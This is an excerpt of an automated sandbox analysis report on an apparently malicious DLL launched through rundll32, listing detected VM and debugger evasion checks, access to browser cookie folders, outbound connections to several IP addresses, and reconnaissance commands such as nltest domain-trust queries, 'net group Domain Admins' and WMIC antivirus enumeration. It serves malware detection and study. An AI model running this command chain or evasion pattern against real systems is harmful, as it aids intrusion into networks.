Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\rundll32.exe Code function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection, 3_2_00000001800655A8
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
Contains functionality to query network adapater information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 4_2_00000237C16C68E8
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 4_2_00000237C16C7FA8
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 545 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 668 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 8786 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\System32\rundll32.exe API coverage: 0.1 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180049AEC 3_2_0000000180049AEC
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep count: 545 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep time: -545000s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2952 Thread sleep count: 668 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2952 Thread sleep time: -66800s >= -30000s Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep count: 8786 > 30 Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 2220 Thread sleep time: -8786000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Queries the current domain controller via net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000237C16CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000237C16C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW, 8_3_000001E3B57E16F4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA, 8_3_000001E3B57E6604
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57EAC90 GetSystemInfo, 8_3_000001E3B57EAC90
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\ Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\ Jump to behavior
Source: Amcache.hve.9.dr Binary or memory string: VMware
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365701357.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000003.3366424299.000001E3B57B0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: rundll32.exe, 00000004.00000002.2009327636.00000237C16F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rod_VMware_SATA_CD00
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW, 3_2_0000000180066C3C
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError, 3_2_00000001800033E0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018000A7AC GetProcessHeap, 3_2_000000018000A7AC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180070760
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000000018006F6E0

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.84.207 443 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle, 3_2_0000000180066A50
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle, 3_2_000000018004A650
